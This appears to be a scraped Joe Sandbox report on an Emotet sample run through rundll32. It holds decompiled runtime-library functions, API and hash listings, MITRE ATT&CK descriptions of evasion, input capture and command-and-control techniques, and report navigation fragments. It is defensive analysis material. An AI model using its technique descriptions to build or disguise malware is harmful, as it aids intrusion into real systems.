						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x1003b940)) = 0;
							} else {
								 *(_t58 + 0x1003b821) =  *(_t58 + 0x1003b821) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x1003b821) =  *(_t58 + 0x1003b821) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x1003b940)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E10011A49(_t45, _v8);
			}

APIs

GetCPInfo.KERNEL32(?,?), ref: 10012665

Strings

, xrefs: 100126B3
, xrefs: 1001268C

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 69a1ab0e8103bec87c632ec3901824e441be69d583726b0f82bf557f3663394d
Instruction ID: fd47742e49a48244401dd7bd98f1011f3380fbaaa6d00055f8455ce6d3a54bb6
Opcode Fuzzy Hash: 69a1ab0e8103bec87c632ec3901824e441be69d583726b0f82bf557f3663394d
Instruction Fuzzy Hash: E8411671508798AFEB16DB64CC95BFA7BE8EB05308F2008E1D741DF1A2D6308AD5D790

Uniqueness

Uniqueness Score: -1.00%

Function 10018BC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E10018BC1(intOrPtr* __eax, char* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _t33;
				char* _t40;
				char* _t47;
				char* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				char* _t51;
				char _t52;
				intOrPtr* _t62;
				signed int _t63;
				signed int _t64;

				_t40 = __ebx;
				_t62 = __eax;
				if(_a12 != 0) {
					E10018BA4((0 |  *__eax == 0x0000002d) + __ebx, 0 | _a4 > 0x00000000);
				}
				_t28 = _t40;
				if( *_t62 == 0x2d) {
					 *_t40 = 0x2d;
					_t28 = _t40 + 1;
				}
				if(_a4 > 0) {
					_t51 = _t28 + 1;
					 *_t28 =  *_t51;
					_t28 = _t51;
					_t52 =  *0x10037d7c; // 0x2e
					 *_t51 = _t52;
				}
				_t47 = E10018100((0 | _a12 == 0x00000000) + _t28 + _a4, "e+000");
				if(_a8 != 0) {
					 *_t47 = 0x45;
				}
				_t48 = _t47 + 1;
				if( *((char*)( *((intOrPtr*)(_t62 + 0xc)))) != 0x30) {
					_t33 =  *((intOrPtr*)(_t62 + 4)) - 1;
					if(_t33 < 0) {
						_t33 =  ~_t33;
						 *_t48 = 0x2d;
					}
					_t49 = _t48 + 1;
					if(_t33 >= 0x64) {
						asm("cdq");
						_t64 = 0x64;
						 *_t49 =  *_t49 + _t33 / _t64;
						_t33 = _t33 % _t64;
					}
					_t50 = _t49 + 1;
					if(_t33 >= 0xa) {
						asm("cdq");
						_t63 = 0xa;
						 *_t50 =  *_t50 + _t33 / _t63;
						_t33 = _t33 % _t63;
					}
					 *((intOrPtr*)(_t50 + 1)) =  *((intOrPtr*)(_t50 + 1)) + _t33;
				}
				return _t40;
			}

APIs

__shift.LIBCMT ref: 10018BE4

Part of subcall function 10018BA4: _strlen.LIBCMT ref: 10018BAC

_strcat.LIBCMT ref: 10018C21

Strings

e+000, xrefs: 10018C13

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __shift_strcat_strlen
String ID: e+000
API String ID: 208078240-1027065040
Opcode ID: 8b664c46d41d344fd38c57cadff2da02c67d8a6601e3c34f11c9681a588d6ac6
Instruction ID: e36b8a4ce4067b9ec2edcc6e788ad3d32d0794eddce4aeacccbb3fc6da22eac8
Opcode Fuzzy Hash: 8b664c46d41d344fd38c57cadff2da02c67d8a6601e3c34f11c9681a588d6ac6
Instruction Fuzzy Hash: 5921C3722093D49FD71A8E389C907953BD49B12294F1884BEE085CE292D679DBC5C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 10016BB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10016BB1() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x1003ba4c; // 0x1
				if(_t45 == 0) {
					E10012B24();
				}
				 *0x1003a4a4 = 0;
				GetModuleFileNameA(0, 0x1003a3a0, 0x104);
				_t10 =  *0x1003ba50; // 0xaf3538
				 *0x1003a1a4 = 0x1003a3a0;
				if(_t10 == 0) {
					L4:
					_t25 = 0x1003a3a0;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E10016A45(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E10011233(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E10016A45(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x1003a188 = _v8 - 1;
					 *0x1003a18c = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}

APIs

___initmbctable.LIBCMT ref: 10016BC3
GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104,00000000,?,?,?,?,?,100117E9,?,?,?,10011907,?,?), ref: 10016BDB

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 10016BCD, 10016BD2

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FileModuleName___initmbctable
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 767393020-2837366778
Opcode ID: 44206a3e75613076b657621f3ddc6271f8e2037c73cd1e956b59ae5e27adaf61
Instruction ID: b88b0de1ae046791a26c58ea28f1b200f4da1d1c9c3bc7000e1e87d1acf64dc8
Opcode Fuzzy Hash: 44206a3e75613076b657621f3ddc6271f8e2037c73cd1e956b59ae5e27adaf61
Instruction Fuzzy Hash: EC110A72E04214AFE711CB99DCC099F7BF8EB4A360F11006AF941DB242DA74EEC08B50

Uniqueness

Uniqueness Score: -1.00%

Function 1001842E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1001842E(void* __ecx, void* __eflags) {
				int _t27;
				short* _t33;
				int _t39;
				int _t40;
				void* _t41;

				E100114D8(__ecx, __eflags);
				 *(_t41 - 0x20) = 0;
				 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
				_t39 =  *(_t41 - 0x2c);
				_t40 =  *(_t41 - 0x30);
				if( *(_t41 - 0x20) != 0) {
					L4:
					if(LCMapStringW( *(_t41 + 8),  *(_t41 + 0xc),  *(_t41 - 0x1c), _t40,  *(_t41 - 0x20), _t39) != 0) {
						_push(0);
						_push(0);
						if( *((intOrPtr*)(_t41 + 0x1c)) != 0) {
							_push( *((intOrPtr*)(_t41 + 0x1c)));
							_push( *((intOrPtr*)(_t41 + 0x18)));
						} else {
							_push(0);
							_push(0);
						}
						_t39 = WideCharToMultiByte( *(_t41 + 0x20), 0,  *(_t41 - 0x20), _t39, ??, ??, ??, ??);
					}
				} else {
					_t33 = E10011233(_t39 + _t39);
					 *(_t41 - 0x20) = _t33;
					if(_t33 != 0) {
						 *((intOrPtr*)(_t41 - 0x34)) = 1;
						goto L4;
					}
				}
				if( *((intOrPtr*)(_t41 - 0x34)) != 0) {
					_push( *(_t41 - 0x20));
					E1001111B();
				}
				if( *((intOrPtr*)(_t41 - 0x38)) != 0) {
					_push( *(_t41 - 0x1c));
					E1001111B();
				}
				_t27 = _t39;
				return E10012D1B(_t27);
			}

APIs

Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 100114F2
Part of subcall function 100114D8: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10011503
Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 10011549

LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 10018470
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 10018493

Strings

@hvpYv, xrefs: 10018493

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: QueryVirtual$ByteCharInfoMultiStringSystemWide
String ID: @hvpYv
API String ID: 1975863849-2766943729
Opcode ID: fb794a0aa2ee34228c8d1ff9b5a2823f554c989d2e60a171a3a29e6b43401857
Instruction ID: 9d08767233352586662f5a009d1dc953ff58a57d780ff25f8ad433979c5e419a
Opcode Fuzzy Hash: fb794a0aa2ee34228c8d1ff9b5a2823f554c989d2e60a171a3a29e6b43401857
Instruction Fuzzy Hash: FB11F275C0016AEFCF10DFA0DC858DEBBB9FF08354B654129FA117A060DB389AA1DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001509A Relevance: 5.1, APIs: 4, Instructions: 57
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001509A() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x1003b7e8; // 0x0
				_t26 =  *0x1003b7f8; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x1003b7ec; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x1003b800, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x1003b7e8 =  *0x1003b7e8 + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x1003b800, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x1003b800, 0,  *0x1003b7ec, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x1003b7f8 =  *0x1003b7f8 + 0x10;
						 *0x1003b7ec = _t24;
						_t15 =  *0x1003b7e8; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,1001568B,00000000,?,00000000), ref: 100150C1
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,1001568B,00000000,?,00000000), ref: 100150FA
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10015118
HeapFree.KERNEL32(00000000,?), ref: 1001512F

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 2064683716234f8dc8322d3380aa3720afb5cb0314e66d74085f078d5ed4a7ee
Instruction ID: fa0dbc0533eb2824c0d2254bc61f18d6a3d2f36dcd1bf0472acf9f081a6e9328
Opcode Fuzzy Hash: 2064683716234f8dc8322d3380aa3720afb5cb0314e66d74085f078d5ed4a7ee
Instruction Fuzzy Hash: D9110730204B25EFE322DF29CCC5A167BF5FB857A97204659E261CE1A1D771A886CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100286A3 Relevance: 5.0, APIs: 4, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100286A3(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x1003a088 == 0) {
					E1002867F();
				}
				_t21 = _a4;
				_t24 = 0x10039e90 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x10039ed4);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x10039ef0 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x10039ed4);
				}
				_t13 = 0x10039ef0 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}

0x100286aa
0x100286ac
0x100286ac
0x100286ba
0x100286be
0x100286c8
0x100286d1
0x100286d6
0x100286e3
0x100286e9
0x100286e9
0x100286ec
0x100286f2
0x100286f6
0x100286fe
0x10028703

APIs

EnterCriticalSection.KERNEL32(10039ED4,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286D1
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286E3
LeaveCriticalSection.KERNEL32(10039ED4,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286EC
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772,1001E169), ref: 100286FE

Part of subcall function 1002867F: InitializeCriticalSection.KERNEL32(10039ED4,100286B1,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772,1001E169,10006E4C,?), ref: 10028697

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-0
Opcode ID: 072baf688489922e528998fa6537eca47b2b6c92223ef9da9c034ae0b78e5f30
Instruction ID: c7d326798cd6783a68320f0ac3dbdb1455df0cfd4a1851898cc364d0e411ca19
Opcode Fuzzy Hash: 072baf688489922e528998fa6537eca47b2b6c92223ef9da9c034ae0b78e5f30
Instruction Fuzzy Hash: 6CF0173540122EEFE701DB54ECC8A56B3ADFB5431AF91042AF54592412D738A5A6CBA4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6xfFjxyRXf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Windows Analysis Report
6xfFjxyRXf

Function 04F66C5E Relevance: 20.0, Strings: 15, Instructions: 1225
COMMONCrypto

Function 10005FD0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 305
memoryCOMMON

Function 04F6BB44 Relevance: 10.4, Strings: 8, Instructions: 372
COMMONCrypto

Function 04F76F79 Relevance: 9.1, Strings: 7, Instructions: 314
COMMONCrypto

Function 04F77EB9 Relevance: 9.0, Strings: 7, Instructions: 275
COMMONCrypto

Function 10004BB0 Relevance: 7.2, APIs: 4, Instructions: 1176
memoryCOMMON

Function 04F70F57 Relevance: 6.6, Strings: 5, Instructions: 370
COMMONCrypto

Function 04F7202D Relevance: 6.5, Strings: 5, Instructions: 207
COMMONCrypto

Function 04F69587 Relevance: 5.2, Strings: 4, Instructions: 228
COMMONCrypto

Function 04F69DE0 Relevance: 5.2, Strings: 4, Instructions: 218
COMMONCrypto

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre